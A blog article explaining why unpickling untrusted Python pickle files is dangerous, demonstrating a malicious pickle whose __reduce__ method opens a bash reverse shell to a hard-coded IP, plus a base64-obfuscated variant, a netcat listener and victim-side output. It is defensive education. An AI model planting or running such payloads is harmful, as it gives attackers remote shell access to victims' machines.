If you are using , especially for machine learning, you should be somewhat familiar with the standard library module named . It is used for Python object serialization and comes very handy in wide range of applications. Some objects that you might want to serialize: a trained scikit-learn model, a Pandas DataFrame that you got after a lengthy join of several tables; basically any Python object that consists of heterogeneous data that you might want to quickly load in a new environment in the future (for homogeneous data, like neural network weights or training data tensor, it’s better to use a more suitable format like ). Python pickle HDF5 In this article I would like to tell you why you should be very cautious when unpickling an object that you obtained from an untrusted source. How Common are Pickles in the Wild? With lots of people doing ML projects and putting them in GitHub repos, it’s inevitable that some projects will contain files (by convention they have extension). Sometimes pickle files are placed there on purpose to make it easier for others to reproduce results using a pre-trained model or a prepared dataset object. Other times they are used during development and then pushed to a repo by accident together with the rest of the project. pickle .pkl It’s hard to come up with an accurate figure on the exact number of pickle files hosted onGitHub since GitHub doesn’t allow searching by file extension alone. I tried the following query: , which searches for pickle files that contain word “model” . Here are the results: extension:pkl model inside the file Now, a pickled object is a Python object hierarchy converted into a byte stream so I wouldn’t hope to find most of the pickle files this way. By GitHub search rules, I had to specify at least one word to search for inside files and I chose “model”. Most of the files found with this query are either symlinks to the actual pickle files in the same repos (with a word “model” somewhere in the symlink path) or some pickled objects that contain a lot of human-readable data (e.g. feature vectors for use with some NLP model). I am not too eager to crawl public GitHub repos and count all pickle files; but I expect the actual number of pickle files to be a few orders of magnitude larger than that I got after executing a relatively narrow query. I know this is a very rough estimation, but I believe you concur that pickle files certainly aren’t rare on GitHub. 16242 Potential for Abuse Here’s an interesting couple of paragraphs from from the : pickle docs When the encounters an object of a type it knows nothing about — such as an extension type — it looks in two places for a hint of how to pickle it. One alternative is for the object to implement a method. If provided, at pickling time will be called with no arguments, and it must return either a string or a tuple. **Pickler** [**__reduce__()**](https://docs.python.org/3.5/library/pickle.html#object.__reduce__) **__reduce__()** … When a tuple is returned, it must be between two and five elements long. Optional elements can either be omitted, or can be provided as their value. The contents of this tuple are pickled as normal and used to reconstruct the object at unpickling time. None This means that it is possible to create an arbitrary Python object that, when unpickled, will execute code that is returned by . Although there are some restrictions on the kind of things that can be returned (e.g. it has to be a callable), it is still relatively easy to create an object that is potentially dangerous when unpickled. __reduce__() Setting Up Reverse Shell Payload One of the simpler things that can be done in this situation is to start a reverse shell in a subprocess. Here’s an example object: class ReverseShell(object): def __reduce__(self):import osimport subprocessif os.name == 'posix':return (subprocess.Popen,('bash -i >& /dev/tcp/52.207.225.255/6006 0>&1',0, None, None, None, None, None, None, True))# making this work for windows seems much harder# please do share if you know how this can be doneelif os.name == 'nt':return None The structure of an object that has to return is very specific. In this example a tuple with two items is returned. Here’s a little breakdown of each item: [__reduce__()](https://docs.python.org/3.5/library/pickle.html#object.__reduce__) [subprocess.Popen](https://docs.python.org/3.6/library/subprocess.html#subprocess.Popen) A callable object that will be called to create the initial version of the object. This class is used to execute a child program in a new process. This new process will start in the background when the object is unpickled. (‘bash -i >& /dev/tcp/52.207.225.255/6006 0>&1’,     -1, None, None, None, None, None, None, True) A tuple of arguments for the callable object. The first argument is the program to be executed by the subprocess. I (as a hypothetical attacker) want to: open bash in interactive mode bash -i redirect both stderr and stdout to some TCP/IP socket. When I use the reverse shell, I want to see all the output on my machine ( ); I don’t want the victim to see what commands I am executing remotely. &> /dev/tcp/52.207.255.255/6006 52.207.255.255 redirect stdin to stdout; this redirection symbol is the second part that is needed to reverse the direction of the “flow” of I/O. Without this the stdin is still going from the victim’s to my (attacker’s) stdout. I want this to be reversed. 0>&1 Almost all of the other arguments are unimportant (that’s why most of them are ). I had to explicitly list them since I needed to change the default value of the 8th argument to and this is the only way to do it when you have to put arguments in a tuple. That 8th argument is and it specifies that is to be used to execute what is specified in the first argument. This is needed in case a target machine has some other shell as default that doesn’t recognize sockets and raises (e.g. ). None True shell=True /bin/sh /dev/tcp/... FileNotFoundError zsh Using Reverse Shell Now that we’ve covered what constitutes a possible malicious pickled object, the only thing left is to pickle it and be prepared for the time when someone unpickles it. >>> import pickle>>> rs = ReverseShell()>>> with open('rs.pkl', 'wb') as f:...     pickle.dump(rs, f)... For this example I will simply listen on the specified port of the attacker’s machine for incoming TCP connections using netcat: attacker:~$ hostname -I 52.207.255.255   attacker:~$ nc -l 6006 When a victim unpickles the file, nothing seems wrong for a first few seconds: victim:~$ python>>> import pickle>>> with open('rs.pkl', 'rb') as f:...    suspicious_obj = pickle.load(f)... Meanwhile at the attacker’s side I can list the directory where the victim unpickled the payload and navigate around victim’s computer. Just to verify that this worked as expected we can check that the effective user id is indeed the one of the victim. attacker:~$ nc -l 6006bash: no job control in this shellbash-3.2$ lsrs.pklbash-3.2$ whoamivictim Now, the victim will notice in a few seconds that something is wrong by trying to use the unpickled object: >>> suspicious_obj<subprocess.Popen object at 0x10715fc88> In a real world scenario, it’s safe to assume that no attacker would sit down, wait for a reverse shell to connect and then do something manually on the victim’s machine. It would more likely be a script waiting for a reverse shell connection that would then steal data/install mining malware/set up another reverse shell in a more well-hidden place. There are a lot of possibilities when an attacker has the same privileges as a victim. Thus, having a reverse shell open for a second or two is more than enough for a prepared attacker. Dealing with Untrusted Pickled Objects Is there a somewhat simple way to check a pickled object for malicious content? If we consider the byte sequence of the object created and pickled previously, we can have a pretty good idea of what will happen if this object is unpickled. >>> with open('rs.pkl', 'rb') as f:...     obj_byte_seq = f.read()>>> obj_byte_seqb'\x80\x03c \nq\x00(X*\x00\x00\x00 0>&1q\x01J\xff\xff\xff\xffNNNNNN\x88tq\x02Rq\x03.' subprocess\nPopen bash -i >& /dev/tcp/ **52.207.255.255** /6006 Even if an argument string passed to is base-64 encoded, it’s still pretty obvious that something is not right with the pickled object: subprocess.Popen class ObfuscatedReverseShell(object): def __reduce__(self):import osimport subprocessif os.name == 'posix':return (subprocess.Popen, ('eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC81Mi4yMDcuMjI1LjI1NS82MDA2IDA+JjE= | base64 -D`', -1, None, None, None, None, None, None, True)) >>> rs = ObfuscatedReverseShell()>>> with open('rs.pkl', 'wb') as f:...     pickle.dump(rs, f)...>>> with open('rs.pkl', 'rb') as f:...     obj_byte_seq = f.read()...>>> obj_byte_seqb'\x80\x03c \nq\x00(XT\x00\x00\x00 `q\x01J\xff\xff\xff\xffNNNNNN\x88tq\x02Rq\x03.' subprocess\nPopen eval `echo YmFzaCAtaSA+JiAvZGV2L3RjcC81Mi4yMDcuMjI1LjI1NS82MDA2IDA+JjE= | base64 -D I imagine that trying to evaluate byte sequence of pickled objects’ that are larger in size would be very tedious. In any case, it’s safer to simply avoid unpickling objects from untrusted sources or do so in a sandbox environment. If what you are looking for is a pre-trained ML model, it’s better to reconstruct the model yourself using separately provided model representation and weights. E.g. it’s possible to representation from json/yaml and then load weights from a HDF5 file ( extension). I skimmed through HDF5 API and didn’t see anything that allows arbitrary code execution at load time like pickle’s does. load a Keras model .hdf5 __reduce__() Here’s a repo with code examples mentioned in this article: pkl_rev_sh

Flow

Don't Trust a Pickle

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

Building a Chatbot Using Rasa Stack: Intro and Tips

0–100 in Django: Starting an app the right way

The Noonification: How to Deal With Flapping or Broken Tests (11/29/2023)

The Noonification: OpenAI is Sam Altman; Sam Altman is OpenAI (11/30/2023)

The Noonification: Panda Power (11/28/2023)

The Noonification: Feature Optimization for Price Prediction (11/26/2023)

Building a Chatbot Using Rasa Stack: Intro and Tips

0–100 in Django: Starting an app the right way

The Noonification: How to Deal With Flapping or Broken Tests (11/29/2023)

The Noonification: OpenAI is Sam Altman; Sam Altman is OpenAI (11/30/2023)

The Noonification: Panda Power (11/28/2023)

The Noonification: Feature Optimization for Price Prediction (11/26/2023)

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps